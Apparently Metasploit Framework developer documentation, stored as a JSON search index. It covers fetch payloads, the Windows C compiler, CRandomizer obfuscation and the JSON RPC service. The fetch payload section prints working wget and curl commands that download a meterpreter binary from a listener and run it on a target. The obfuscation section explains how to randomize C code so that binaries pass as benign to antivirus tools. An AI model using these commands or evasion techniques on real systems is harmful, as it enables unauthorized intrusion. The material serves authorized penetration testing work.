    "relUrl": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html#filter-examples"
  },"344": {
    "doc": "How to use datastore options",
    "title": "How to use datastore options",
    "content": " ",
    "url": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html",
    "relUrl": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html"
  },"345": {
    "doc": "How to use Fetch Payloads",
    "title": "Fetch Payloads",
    "content": " ",
    "url": "/docs/development/developing-modules/guides/how-to-use-fetch-payloads.html#fetch-payloads",
    "relUrl": "/docs/development/developing-modules/guides/how-to-use-fetch-payloads.html#fetch-payloads"
  },"346": {
    "doc": "How to use Fetch Payloads",
    "title": "What Are Fetch Payloads?",
    "content": "Fetch payloads are adapted, command-based payloads use network-enabled binaries on a remote host to download binary payloads to that remote host. Adapted payloads are just payloads where we have bolted an extra feature on top of existing payloads to modify the behavior. In this case, you can still use all your favorite binary payloads and transports, but we’ve added an optional fetch payload adapter on top to stage the payloads using a networking binary and server. They function similarly to some Command Stagers, but are based on the payload side rather than the exploit side to simplify integration and portability. Fetch payloads are a fast, easy way to get a session on a target that has a command injection or code execution vulnerability and a known binary with the ability to download and store a file. ",
    "url": "/docs/development/developing-modules/guides/how-to-use-fetch-payloads.html#what-are-fetch-payloads",
    "relUrl": "/docs/development/developing-modules/guides/how-to-use-fetch-payloads.html#what-are-fetch-payloads"
  },"347": {
    "doc": "How to use Fetch Payloads",
    "title": "Terminology",
    "content": "In the following documentation, it is useful to agree on certain terms to use so we don’t get confused or confusing. Fetch Payload - The command to execute on the remote host to retrieve and execute the Served Payload Fetch Binary - The binary we are using on the remote host to download the Served Payload. Examples might be WGET, cURL, or Certutil. Fetch Protocol - The protocol used to download the served payload, for example HTTP, HTTPS or TFTP. Fetch Listener - The server hosting the served payload. Fetch Handler - The same as Fetch Listener Served Payload - The underlying payload we want to execute. We also might call this the Adapted Payload. Served Payload Handler - The handler for the served payload. This is just a standard payload like meterpreter/reverse_tcp or shell_reverse_tcp. ",
    "url": "/docs/development/developing-modules/guides/how-to-use-fetch-payloads.html#terminology",
    "relUrl": "/docs/development/developing-modules/guides/how-to-use-fetch-payloads.html#terminology"
  },"348": {
    "doc": "How to use Fetch Payloads",
    "title": "Organization",
    "content": "Unlike Command Stagers which are organized by binary, Fetch Payloads are organized by server. Currently, we support HTTP, HTTPS, and TFTP servers. Once you select a fetch payload, you can select the binary you’d like to run on the remote host to download the served payload prior to execution. Here is the naming convention for fetch payloads: &amp;lt;cmd&amp;gt;/&amp;lt;platform&amp;gt;/&amp;lt;fetch protocol&amp;gt;/served_payload For example: cmd/linux/https/x64/meterpreter/reverse_tcp Will do four things: . | Create a linux/x64/meterpreter/reverse_tcp elf binary to be the served payload. | Serve the above served payload on an HTTPS server | Start a served payload handler for the served payload to call back to | Generate a command to execute on a remote host that will download the served payload and run it. | . ",
    "url": "/docs/development/developing-modules/guides/how-to-use-fetch-payloads.html#organization",
    "relUrl": "/docs/development/developing-modules/guides/how-to-use-fetch-payloads.html#organization"
  },"349": {
    "doc": "How to use Fetch Payloads",
    "title": "A Simple Stand-Alone Example",
    "content": "The fastest way to understand Fetch Payloads is to use them and examine the output. For example, let’s assume a Linux target with the ability to connect back to us with an HTTP connection and a command execution vulnerability. First, let’s look at the payload in isolation: . msf6 exploit(multi/ssh/sshexec) &amp;gt; use payload/cmd/linux/http/x64/meterpreter/reverse_tcp msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) &amp;gt; show options Module options (payload/cmd/linux/http/x64/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) FETCH_FILENAME YXeSdwsoEfOH no Name to use on remote system when storing payload FETCH_SRVHOST 0.0.0.0 yes Local IP to use for serving payload FETCH_SRVPORT 8080 yes Local port to use for serving payload FETCH_URIPATH no Local URI to use for serving payload FETCH_WRITABLE_DIR yes Remote writable dir to store payload LHOST yes The listen address (an interface may be specified) LPORT 4444 yes The listen port View the full module info with the info, or info -d command. msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) &amp;gt; . Options . FETCH_COMMAND is the binary we wish to run on the remote host to download the adapted payload. Currently, the supported options are CURL FTP TFTP TNFTP WGET on Linux hosts and CURL TFTP CERTUTIL on Windows hosts. We’ll get into more details on the binaries later. FETCH_FILENAME is the name you’d like the executable payload saved as on the remote host. This option is not supported by every binary and must end in .exe on Windows hosts. The default value is random. FETCH_SRVHOST is the IP where the server will listen. FETCH_SRVPORT is the port where the server will listen. FETCH_URIPATH is the URI corresponding to the payload file. The default value is deterministic based on the underlying payload so a payload created in msfvenom will match a listener started in Framework assuming the underlying served payload is the same. FETCH_WRITABLE_DIR is the directory on the remote host where we’d like to store the served payload prior to execution. This value is not supported by all binaries. If you set this value and it is not supported, it will generate an error. The remaining options will be the options available to you in the served payload; in this case our served payload is linux/x64/meterpreter/reverse_tcp so our only added options are LHOST and LPORT. If we had selected a different payload, we would see different options. Generating the Fetch Payload . msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) &amp;gt; set FETCH_COMMAND WGET FETCH_COMMAND =&amp;gt; WGET msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) &amp;gt; set FETCH_SRVHOST 10.5.135.201 FETCH_SRVHOST =&amp;gt; 10.5.135.201 msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) &amp;gt; set FETCH_SRVPORT 8000 FETCH_SRVPORT =&amp;gt; 8000 msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) &amp;gt; set LHOST 10.5.135.201 LHOST =&amp;gt; 10.5.135.201 msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) &amp;gt; set LPORT 4567 LPORT =&amp;gt; 4567 msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) &amp;gt; generate -f raw wget -qO ./YXeSdwsoEfOH http://10.5.135.201:8000/3cP1jDrJ3uWM1WrsRx3HTw; chmod +x ./YXeSdwsoEfOH; ./YXeSdwsoEfOH &amp;amp; msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) &amp;gt; . You can see the fetch payload generated: wget -qO ./YXeSdwsoEfOH http://10.5.135.201:8000/3cP1jDrJ3uWM1WrsRx3HTw; chmod +x ./YXeSdwsoEfOH; ./YXeSdwsoEfOH &amp;amp; This command downloads the served payload, marks it as executable, and then executes it on the remote host. Starting the Fetch Server . When you start the Fetch Handler, it starts both the server hosting the binary payload and the listener for the served payload. With verbose set to true, you can see both the Fetch Handler and the Served Payload Handler are started: . msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) &amp;gt; to_handler [*] wget -qO ./YBybOrAmkV http://10.5.135.201:8000/3cP1jDrJ3uWM1WrsRx3HTw; chmod +x ./YBybOrAmkV; ./YBybOrAmkV &amp;amp; [*] Payload Handler Started as Job 0 [*] Fetch Handler listening on 10.5.135.201:8000 [*] http server started [*] Started reverse TCP handler on 10.5.135.201:4567 . Fetch Handlers and Served Payload Handlers . The Fetch Handler is tracked with the Served Payload Handler, so you will only see the Served Payload Handler under Jobs, even though the Fetch Handler is listening: . msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) &amp;gt; jobs -l Jobs ==== Id Name Payload Payload opts -- ---- ------- ------------ 0 Exploit: multi/handler cmd/linux/http/x64/meterpreter/reverse_tcp tcp://10.5.135.201:4567 msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) &amp;gt; netstat -ant | grep 8000 [*] exec: netstat -ant | grep 8000 tcp 0 0 10.5.135.201:8000 0.0.0.0:* LISTEN . Killing the Served Payload handler will kill the Fetch Handler as well: . msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) &amp;gt; jobs -k 0 [*] Stopping the following job(s): 0 [*] Stopping job 0 msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) &amp;gt; netstat -ant | grep 8000 [*] exec: netstat -ant | grep 8000 msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) &amp;gt; . ",
    "url": "/docs/development/developing-modules/guides/how-to-use-fetch-payloads.html#a-simple-stand-alone-example",
    "relUrl": "/docs/development/developing-modules/guides/how-to-use-fetch-payloads.html#a-simple-stand-alone-example"
  },"350": {
    "doc": "How to use Fetch Payloads",
    "title": "Using Fetch Payloads on the Fly",
    "content": "One really nice thing about Fetch Payloads is that it gives you the ability to execute a binary payload very quickly, without relying on a session in framework or having to get a payload on target. If you have a shell session or even a really odd situation where you can execute commands, you can get a session in framework quickly without having to upload a payload manually. Just follow the steps above, and run the provided command. Right now, the only thing we serve are Framework payloads, but in the future, expanding to serve and execute any executable binary would be relatively trivial. ",
    "url": "/docs/development/developing-modules/guides/how-to-use-fetch-payloads.html#using-fetch-payloads-on-the-fly",
    "relUrl": "/docs/development/developing-modules/guides/how-to-use-fetch-payloads.html#using-fetch-payloads-on-the-fly"
  },"351": {
    "doc": "How to use Fetch Payloads",
    "title": "Using it in an exploit",
    "content": "Using Fetch Payloads is no different than using any other command payload. First, give users access to the Fetch payloads for a given platform by adding a target that supports ARCH_CMD and the desired platform, either windows or linux. Once the target has been added, you can get access to the command by invoking payload.encoded and use it as the command to execute on the remote target. Example paired with CmdStager . There is likely to be some overlap between fetch payloads and command stagers. Let’s talk briefly about how to support both in an exploit. Please see the documentation on Command Stagers for required imports and specifics for command stagers. in this case, I’m only documenting the changes to make so that fetch payloads will work alongside command stagers or to use fetch payloads in the style of command stagers, which I suggest you do. In this case, I’ve modified the code provided in the command stager documentation to support both linux and unix command payloads. All I did was give an array value for the Platform value and change theType to something more generic: . 'Targets' =&amp;gt; [ [ 'Linux Command', { 'Arch' =&amp;gt; [ ARCH_CMD ], 'Platform' =&amp;gt; [ 'unix', 'linux' ], 'Type' =&amp;gt; :nix_cmd } ] ] . For the execute_command method, nothing changes: . def execute_command(cmd, _opts = {}) populate_values if @sid.nil? || @token.nil? uri = datastore['URIPATH'] + '/vendor/htmlawed/htmlawed/htmLawedTest.php' send_request_cgi({ 'method' =&amp;gt; 'POST', 'uri' =&amp;gt; normalize_uri(uri), 'cookie' =&amp;gt; 'sid=' + @sid, 'ctype' =&amp;gt; 'application/x-www-form-urlencoded', 'encode_params' =&amp;gt; true, 'vars_post' =&amp;gt; { 'token' =&amp;gt; @token, 'text' =&amp;gt; cmd, 'hhook' =&amp;gt; 'exec', 'sid' =&amp;gt; @sid } }) end . The only change in the exploit method is the use of the more generic Type value in the case statement. Nothing else needs to change. def exploit print_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\") case target['Type'] when :nix_cmd execute_command(payload.encoded) when :linux_dropper execute_cmdstager end end . If you have an exploit that already supports Unix Command payloads and you’d like it to support Linux Command payloads like Fetch Payloads, you can simply add the linux value to the platform array: . 'Nix Command', { 'Platform' =&amp;gt; [ 'unix', 'linux' ], 'Arch' =&amp;gt; ARCH_CMD, 'Type' =&amp;gt; :unix_cmd, } . ",
    "url": "/docs/development/developing-modules/guides/how-to-use-fetch-payloads.html#using-it-in-an-exploit",
    "relUrl": "/docs/development/developing-modules/guides/how-to-use-fetch-payloads.html#using-it-in-an-exploit"
  },"352": {
    "doc": "How to use Fetch Payloads",
    "title": "Supported Commands",
    "content": "Windows And Linux Both . CURL . cURL comes pre-installed on Windows 10 and 11, and it is incredibly common on linux platforms and the options are very standardized across releases and platforms. This makes cURL a good default choice for both Linux and Windows targets. All options and server protocol types are supported by the cURL command. TFTP . The TFTP binary is useful only in edge cases because of a long list of limitations: 1) It is a Windows feature, but it is turned off by default on Windows Vista and later. 2) While you are likely to find it on Linux and Unix hosts, the options are not standard across releases. 3) The TFTP binary included in many Linux systems and all Windows systems does not allow for the port to be configured, nor does it allow for the destination filename to be configured, so FETCH_SRVPORT must always be set to 69 and FETCH_WRITABLE_DIR and FETCH_FILENAME must be empty. Listening on port 69 in Framework can be problematic, so I suggest that you use the advanced option FetchListenerBindPort to start the server on a different port and redirect the connection with a tool like iptables to a high port. For example, if you are on a linux host with iptables, you can execute the following commands to redirect a connection on UDP port 69 to UDP port 3069: sudo iptables -t nat -I PREROUTING -p udp --dport 69 -j REDIRECT --to-ports 3069 sudo iptables -t nat -I OUTPUT -p udp -d 127.0.0.1 --dport 69 -j REDIRECT --to-ports 3069 Then, you can set FetchListenerBindPort to 3069 and get the callback correctly. 4) Because tftp is a udp-based protocol and because od the implementation of the server within Framework, each time you start a tftp fetch handler, a new service will start: . msf6 payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) &amp;gt; jobs Jobs ==== Id Name Payload Payload opts -- ---- ------- ------------ 2 Exploit: multi/handler cmd/windows/tftp/x64/meterpreter/reverse_tcp tcp://10.5.135.201:4444 msf6 payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) &amp;gt; set LPORT 4445 LPORT =&amp;gt; 4445 msf6 payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) &amp;gt; to_handler [*] Command to run on remote host: curl -so plEYxIdBQna.exe tftp://10.5.135.201:8080/test1 &amp;amp; start /B plEYxIdBQna.exe [*] Payload Handler Started as Job 4 [*] starting tftpserver on 10.5.135.201:8080 [*] Started reverse TCP handler on 10.5.135.201:4445 msf6 payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) &amp;gt; jobs Jobs ==== Id Name Payload Payload opts -- ---- ------- ------------ 2 Exploit: multi/handler cmd/windows/tftp/x64/meterpreter/reverse_tcp tcp://10.5.135.201:4444 4 Exploit: multi/handler cmd/windows/tftp/x64/meterpreter/reverse_tcp tcp://10.5.135.201:4445 msf6 payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) &amp;gt; netstat -an | grep 8080 [*] exec: netstat -an | grep 8080 udp 0 0 10.5.135.201:8080 0.0.0.0:* udp 0 0 10.5.135.201:8080 0.0.0.0:* msf6 payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) &amp;gt; set FETCH_URIPATH test4 FETCH_URIPATH =&amp;gt; test4 msf6 payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) &amp;gt; set LPORT 8547 LPORT =&amp;gt; 8547 msf6 payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) &amp;gt; to_handler [*] Command to run on remote host: curl -so DOjmRoCOSMn.exe tftp://10.5.135.201:8080/test4 &amp;amp; start /B DOjmRoCOSMn.exe [*] Payload Handler Started as Job 5 [*] starting tftpserver on 10.5.135.201:8080 [*] Started reverse TCP handler on 10.5.135.201:8547 msf6 payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) &amp;gt; netstat -an | grep 8080 [*] exec: netstat -an | grep 8080 udp 0 0 10.5.135.201:8080 0.0.0.0:* udp 0 0 10.5.135.201:8080 0.0.0.0:* udp 0 0 10.5.135.201:8080 0.0.0.0:* . There is nothing to stop you from creating a race condition by starting multiple tftp servers with the same IP, port, and FETCH_URI value but serving different payloads. This will result in a race condition where the payload served is non-deterministic. Windows Only . Certutil . Certutil is a great choice for Windows targets- it is likely to be present on most recent releases of Windows and is highly configurable. The one troublesome aspect is that there is no insecure mode for Certutil, so if you are using Certutil with the HTTPS protocol, the certificate must be correct and checked. It supports HTTP and HTTPS protocols. Linux Only . FTP . FTP is an old but useful binary. While we support using the FTP binary, we do not have an FTP server. Modern releases of FTP support both HTTP and HTTPS protocols. Unfortunately, we only support these modern versions of inline FTP, so it may not be appropriate for older systems. TNFTP . TNFTP (not to be confused with TFTP) is a newer version of FTP. It is exactly the same as modern FTP, but sometimes both the legacy FTP and TNFTP are present on a system, so the command will be tnftp rather than ftp. WGET . WGET is likely the first choice for a linux-only target. It supports both HTTPS and HTTP and all Fetch payload options. It is ubiquitous on Linux hosts and very standard, making it an excellent choice. ",
    "url": "/docs/development/developing-modules/guides/how-to-use-fetch-payloads.html#supported-commands",
    "relUrl": "/docs/development/developing-modules/guides/how-to-use-fetch-payloads.html#supported-commands"
  },"353": {
    "doc": "How to use Fetch Payloads",
    "title": "How to use Fetch Payloads",
    "content": " ",
    "url": "/docs/development/developing-modules/guides/how-to-use-fetch-payloads.html",
    "relUrl": "/docs/development/developing-modules/guides/how-to-use-fetch-payloads.html"
  },"354": {
    "doc": "Overview",
    "title": "On this page",
    "content": ". | EXE Example | DLL Example | Printf() | Custom Headers | Code Randomization | . Metasploit::Framework::Compiler::Windows is a wrapper of Metasm specifically for compiling C code for the Windows platform. The purpose of the wrapper is to support default headers, such as stdio.h, stdio.h, String.h, Windows.h, or some other important headers that you might use while writing in C. ",
    "url": "/docs/development/developing-modules/libraries/c/how-to-use-metasploit-framework-compiler-windows-to-compile-c-code.html#on-this-page",
    "relUrl": "/docs/development/developing-modules/libraries/c/how-to-use-metasploit-framework-compiler-windows-to-compile-c-code.html#on-this-page"
  },"355": {
    "doc": "Overview",
    "title": "EXE example",
    "content": "c_template = %Q|#include &amp;lt;Windows.h&amp;gt; int main(void) { LPCTSTR lpMessage = \"Hello World\"; LPCTSTR lpTitle = \"Hi\"; MessageBox(NULL, lpMessage, lpTitle, MB_OK); return 0; }| require 'metasploit/framework/compiler/windows' ## Save as an exe variable exe = Metasploit::Framework::Compiler::Windows.compile_c(c_template) ## Save the binary as a file Metasploit::Framework::Compiler::Windows.compile_c_to_file('/tmp/test.exe', c_template) . ",
    "url": "/docs/development/developing-modules/libraries/c/how-to-use-metasploit-framework-compiler-windows-to-compile-c-code.html#exe-example",
    "relUrl": "/docs/development/developing-modules/libraries/c/how-to-use-metasploit-framework-compiler-windows-to-compile-c-code.html#exe-example"
  },"356": {
    "doc": "Overview",
    "title": "DLL example",
    "content": "c_template = %Q|#include &amp;lt;Windows.h&amp;gt; BOOL APIENTRY DllMain __attribute__((export))(HMODULE hModule, DWORD dwReason, LPVOID lpReserved) { switch (dwReason) { case DLL_PROCESS_ATTACH: MessageBox(NULL, \"Hello World\", \"Hello\", MB_OK); break; case DLL_THREAD_ATTACH: break; case DLL_THREAD_DETACH: break; case DLL_PROCESS_DETACH: break; } return TRUE; } // This will be a function in the export table int Msg __attribute__((export))(void) { MessageBox(NULL, \"Hello World\", \"Hello\", MB_OK); return 0; } | require 'metasploit/framework/compiler/windows' dll = Metasploit::Framework::Compiler::Windows.compile_c(c_template, :dll) . To load a DLL, you can use the LoadLibrary API: . #include &amp;lt;Windows.h&amp;gt; #include &amp;lt;stdio.h&amp;gt; int main(void) { HMODULE hMod = LoadLibrary(\"hello_world.dll\"); if (hMod) { printf(\"hello_world.dll loaded\\n\"); } else { printf(\"Unable to load hello_world.dll\\n\"); } } . Or call the function in export with rundll32: . rundll32 hell_world.dll,Msg . ",
    "url": "/docs/development/developing-modules/libraries/c/how-to-use-metasploit-framework-compiler-windows-to-compile-c-code.html#dll-example",
    "relUrl": "/docs/development/developing-modules/libraries/c/how-to-use-metasploit-framework-compiler-windows-to-compile-c-code.html#dll-example"
  },"357": {
    "doc": "Overview",
    "title": "Printf()",
    "content": "Methods like printf() won’t actually print anything, because it’s not connected up to stdout. If you want to use printf() for debugging purposes, consider using OutputDebugString, or MessageBox. ",
    "url": "/docs/development/developing-modules/libraries/c/how-to-use-metasploit-framework-compiler-windows-to-compile-c-code.html#printf",
    "relUrl": "/docs/development/developing-modules/libraries/c/how-to-use-metasploit-framework-compiler-windows-to-compile-c-code.html#printf"
  },"358": {
    "doc": "Overview",
    "title": "Custom Headers",
    "content": "Currently, the Metasm wrapper does not support custom headers from an arbitrary location. To work around this, you can place your headers in data/headers/windows, and then add that file name in lib/metasploit/framework/compiler/headers/windows.h. ",
    "url": "/docs/development/developing-modules/libraries/c/how-to-use-metasploit-framework-compiler-windows-to-compile-c-code.html#custom-headers",
    "relUrl": "/docs/development/developing-modules/libraries/c/how-to-use-metasploit-framework-compiler-windows-to-compile-c-code.html#custom-headers"
  },"359": {
    "doc": "Overview",
    "title": "Code Randomization",
    "content": "Metasploit::Framework::Compiler supports obfuscation that randomizes code at the source code level, and then compile. There are two methods we can use: . | Metasploit::Framework::Compiler::Windows.compile_random_c | Metasploit::Framework::Compiler::Windows.compile_random_c_to_file | . Metasploit::Framework::Compiler::Windows.compile_random_c_to_file example: . require 'msf/core' require 'metasploit/framework/compiler/windows' c_source_code = %Q| #include &amp;lt;Windows.h&amp;gt; int main() { const char* content = \"Hello World\"; const char* title = \"Hi\"; MessageBox(0, content, title, MB_OK); return 0; }| outfile = \"/tmp/helloworld.exe\" weight = 70 # This value is used to determine how random the code gets. Metasploit::Framework::Compiler::Windows.compile_random_c_to_file(outfile, c_source_code, weight: weight) . ",
    "url": "/docs/development/developing-modules/libraries/c/how-to-use-metasploit-framework-compiler-windows-to-compile-c-code.html#code-randomization",
    "relUrl": "/docs/development/developing-modules/libraries/c/how-to-use-metasploit-framework-compiler-windows-to-compile-c-code.html#code-randomization"
  },"360": {
    "doc": "Overview",
    "title": "Overview",
    "content": " ",
    "url": "/docs/development/developing-modules/libraries/c/how-to-use-metasploit-framework-compiler-windows-to-compile-c-code.html",
    "relUrl": "/docs/development/developing-modules/libraries/c/how-to-use-metasploit-framework-compiler-windows-to-compile-c-code.html"
  },"361": {
    "doc": "C Obfuscation",
    "title": "How to use Metasploit::Framework::Obfuscation::CRandomizer",
    "content": " ",
    "url": "/docs/development/developing-modules/libraries/obfuscation/how-to-use-metasploit-framework-obfuscation-crandomizer.html#how-to-use-metasploitframeworkobfuscationcrandomizer",
    "relUrl": "/docs/development/developing-modules/libraries/obfuscation/how-to-use-metasploit-framework-obfuscation-crandomizer.html#how-to-use-metasploitframeworkobfuscationcrandomizer"
  },"362": {
    "doc": "C Obfuscation",
    "title": "What is CRandomizer",
    "content": "CRandomizer is an obfuscation feature in Metasploit Framework that allows you to randomize C code. It is done by injecting random statements such as native API calls, custom fake function calls, or other routines, etc. The CRandomizer is also supported by Metasploit Framework’s code compiling API, which allows you to build a custom application that is unique (in terms of checksums), also harder to reverse-engineer. The randomness of the modification is based on a weight, an arbitrary number from 0 - 100. The higher the number, the more random the code gets. ",
    "url": "/docs/development/developing-modules/libraries/obfuscation/how-to-use-metasploit-framework-obfuscation-crandomizer.html#what-is-crandomizer",
    "relUrl": "/docs/development/developing-modules/libraries/obfuscation/how-to-use-metasploit-framework-obfuscation-crandomizer.html#what-is-crandomizer"
  },"363": {
    "doc": "C Obfuscation",
    "title": "Components",
    "content": "CRandomizer relies on Metasm to be able to parse C code. The following components are built to parse and modify the source code. ",
    "url": "/docs/development/developing-modules/libraries/obfuscation/how-to-use-metasploit-framework-obfuscation-crandomizer.html#components",
    "relUrl": "/docs/development/developing-modules/libraries/obfuscation/how-to-use-metasploit-framework-obfuscation-crandomizer.html#components"
  },"364": {
    "doc": "C Obfuscation",
    "title": "Code Factory",
    "content": "Also known as Metasploit::Framework::Obfuscation::CRandomizer::CodeFactory. The CodeFactory module is used to make the random stubs that will get injected later in the source code. Currently, the things this class is capable of making include small stubs like if statements, a switch, fake functions, and Windows API calls, etc. Each stub tends to be small, and considered as benign by most AVs. Every class in CodeFactory, except for Base, FakeFunction, and FakeFunctionCollection, is a stub candidate that gets randomly selected and used in the source code. If a stub requires a native API call, then the class can specify @dep to set that dependency. If the source code does not support the API call, then the next stub candidate is used (or until one is found). For example, the CRandomizer::CodeFactory::OutputDebugString class is used to generate a fake OutputDebugString call, and the dependency is set as ['OutputDebugString']. If the source code includes the Windows.h header, the CRandomizer knows it is okay to inject OutputDebugString. If not, CRandomizer will not use it. ",
    "url": "/docs/development/developing-modules/libraries/obfuscation/how-to-use-metasploit-framework-obfuscation-crandomizer.html#code-factory",
    "relUrl": "/docs/development/developing-modules/libraries/obfuscation/how-to-use-metasploit-framework-obfuscation-crandomizer.html#code-factory"
  },"365": {
    "doc": "C Obfuscation",
    "title": "Modifier",
    "content": "Also known as Metasploit::Framework::Obfuscation::CRandomizer::Modifier. The Modifier class decides how something should be modified, and actually modifies the source code, for example: a function, different if statements, loops, nested blocks, etc. While the modifier walks through the source, it will randomly inject extra code (provided by the CodeFactory class) at each statement, until there are no more functions to modify. ",
    "url": "/docs/development/developing-modules/libraries/obfuscation/how-to-use-metasploit-framework-obfuscation-crandomizer.html#modifier",
    "relUrl": "/docs/development/developing-modules/libraries/obfuscation/how-to-use-metasploit-framework-obfuscation-crandomizer.html#modifier"
  },"366": {
    "doc": "C Obfuscation",
    "title": "Parser",
    "content": "Also known as Metasploit::Framework::Obfuscation::CRandomizer::Parser. The main purpose of the Parser class is to convert the source code into a parsable format using Metasm, and then pass the functions to the Modifier class to process. ",
    "url": "/docs/development/developing-modules/libraries/obfuscation/how-to-use-metasploit-framework-obfuscation-crandomizer.html#parser",
    "relUrl": "/docs/development/developing-modules/libraries/obfuscation/how-to-use-metasploit-framework-obfuscation-crandomizer.html#parser"
  },"367": {
    "doc": "C Obfuscation",
    "title": "Utility",
    "content": "The Utility class provides quick-to-use methods that any CRandomizer classes could use. ",
    "url": "/docs/development/developing-modules/libraries/obfuscation/how-to-use-metasploit-framework-obfuscation-crandomizer.html#utility",
    "relUrl": "/docs/development/developing-modules/libraries/obfuscation/how-to-use-metasploit-framework-obfuscation-crandomizer.html#utility"
  },"368": {
    "doc": "C Obfuscation",
    "title": "Code Example",
    "content": " ",
    "url": "/docs/development/developing-modules/libraries/obfuscation/how-to-use-metasploit-framework-obfuscation-crandomizer.html#code-example",
    "relUrl": "/docs/development/developing-modules/libraries/obfuscation/how-to-use-metasploit-framework-obfuscation-crandomizer.html#code-example"
  },"369": {
    "doc": "C Obfuscation",
    "title": "Creating a new stub",
    "content": "First, add a new file under the code_factory with an arbitrary file name. For example: hello.rb. In this example, let’s create a new stub that will printf() “Hello World”. Your stub should be written as a class under the CodeFactory namespace, and make sure to inherit the Base class. Like this: . require 'metasploit/framework/obfuscation/crandomizer/code_factory/base' module Metasploit module Framework module Obfuscation module CRandomizer module CodeFactory class Printf &amp;lt; Base def initialize super @dep = ['printf'] end def stub %Q| int printf(const char*); void stub() { printf(\"Hello World\"); }| end end end end end end end . Notice a couple of things: . | Every class should have its own stub method. And this stub method should return a string that contains the code you wish to inject. In addition, your code should be written as a function so that Metasm knows how to pick it up, hence the printf is in a void stub() function. | If your stub requires a native API (in this case, we are using printf), then you must add this function name in the @dep instance variable, which is an array. | Please keep in mind that your stub should remain simple and small, and not unique. For example, avoid: . | Allocate a huge chunk of memory | Avoid marking or allocating executable memory | Loops | Load referenced section, resource, or .data | Anti-debugging functions from the Windows API | Lots of function calls | Unique strings | APIs that access the Windows registry or the file system | XOR | Shellcode | Any other suspicious code patterns that are unique to malware. | . | . ",
    "url": "/docs/development/developing-modules/libraries/obfuscation/how-to-use-metasploit-framework-obfuscation-crandomizer.html#creating-a-new-stub",
    "relUrl": "/docs/development/developing-modules/libraries/obfuscation/how-to-use-metasploit-framework-obfuscation-crandomizer.html#creating-a-new-stub"
  },"370": {
    "doc": "C Obfuscation",
    "title": "Randomizing source code",
    "content": "Please refer to tools/exploit/random_compile_c.rb for example. ",
    "url": "/docs/development/developing-modules/libraries/obfuscation/how-to-use-metasploit-framework-obfuscation-crandomizer.html#randomizing-source-code",
    "relUrl": "/docs/development/developing-modules/libraries/obfuscation/how-to-use-metasploit-framework-obfuscation-crandomizer.html#randomizing-source-code"
  },"371": {
    "doc": "C Obfuscation",
    "title": "C Obfuscation",
    "content": " ",
    "url": "/docs/development/developing-modules/libraries/obfuscation/how-to-use-metasploit-framework-obfuscation-crandomizer.html",
    "relUrl": "/docs/development/developing-modules/libraries/obfuscation/how-to-use-metasploit-framework-obfuscation-crandomizer.html"
  },"372": {
    "doc": "How to use Metasploit JSON RPC",
    "title": "Starting the JSON API Server",
    "content": "The pre-requisite to running the JSON API Server is to run your Metasploit database. This can be initialized with msfdb. Note that msfdb will ask if you wish to run the JSON RPC web service - but it is not required for this guide which shows how to run the JSON service directly with thin or Puma: . First run the Metasploit database: . msfdb init . After configuring the database the JSON RPC service can be initialized with the thin Ruby web server: . bundle exec thin --rackup msf-json-rpc.ru --address 0.0.0.0 --port 8081 --environment production --tag msf-json-rpc start . Or with Puma: . bundle exec puma msf-json-rpc.ru --port 8081 --environment production --tag msf-json-rpc start . Development . If you are wanting to develop or debug the Ruby implementation of the JSON RPC service - it can be useful to run the Metasploit API synchronously in the foreground. This allows for console logs to appear directly in the terminal, as well as being able to interact with breakpoints via require 'pry-byebug'; binding.pry: . It is possible to debug Msfconsole’s webservice component too: . bundle exec ruby ./msfdb reinit bundle exec ruby ./msfdb --component webservice stop bundle exec ruby ./msfdb --component webservice --no-daemon start . RPC Logging . You can configure the RPC service logging with the MSF_WS_DATA_SERVICE_LOGGER environment variable. The list of supported loggers is viewable with msfconsole --help. The list at the time of writing is: . | Stdout / Stderr / StdoutWithoutTimestamps - Write logs to stdout/stderr | Flatfile / TimestampColorlessFlatfile - Write logs to ~/.msf4/logs | . Example usage: . $ MSF_WS_DATA_SERVICE_LOGGER=Stdout bundle exec thin --rackup msf-json-rpc.ru --address localhost --port 8081 --environment production --tag msf-json-rpc start [11/25/2020 17:34:53] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported [11/25/2020 17:34:53] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported [11/25/2020 17:34:53] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported [11/25/2020 17:34:53] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported [11/25/2020 17:34:54] [e(0)] core: Unable to load module /Users/adfoster/Documents/code/metasploit-framework/modules/auxiliary/gather/office365userenum.py - LoadError Try running file manually to check for errors or dependency issues. Thin web server (v1.7.2 codename Bachmanity) Maximum connections set to 1024 Listening on localhost:8081, CTRL+C to stop [11/25/2020 17:35:17] [d(0)] core: Already established connection to postgresql, so reusing active connection. 